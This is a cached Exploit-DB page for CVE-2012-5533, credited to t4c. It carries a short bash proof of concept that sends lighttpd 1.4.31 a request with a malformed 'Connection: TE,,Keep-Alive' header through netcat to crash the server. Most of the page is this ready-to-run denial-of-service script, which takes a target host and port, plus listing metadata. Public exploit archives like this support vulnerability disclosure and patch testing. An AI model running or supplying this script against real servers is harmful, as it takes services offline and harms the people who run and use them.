lighttpd 1.4.31 Denial of Service PoC



EDB-ID: 22902 CVE: 2012-5533 OSVDB-ID: 87623
Author: t4c Published: 2012-11-22 Verified: spacer
Exploit Code:   spacer Vulnerable App:    spacer

Rating

(0.0)
spacer spacer spacer
#!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: t4c@ghcif.de
# Vendor Homepage: www.lighttpd.net
# Software Link: download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz 
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533

if [ $# -lt 2 ]
then
	echo "usage :$0 <Host/IP> <Port>"
else
	echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi





© Offensive Security 2014
gipoco.com is neither affiliated with the authors of this page nor responsible for its contents. This is a safe-cache copy of the original web site.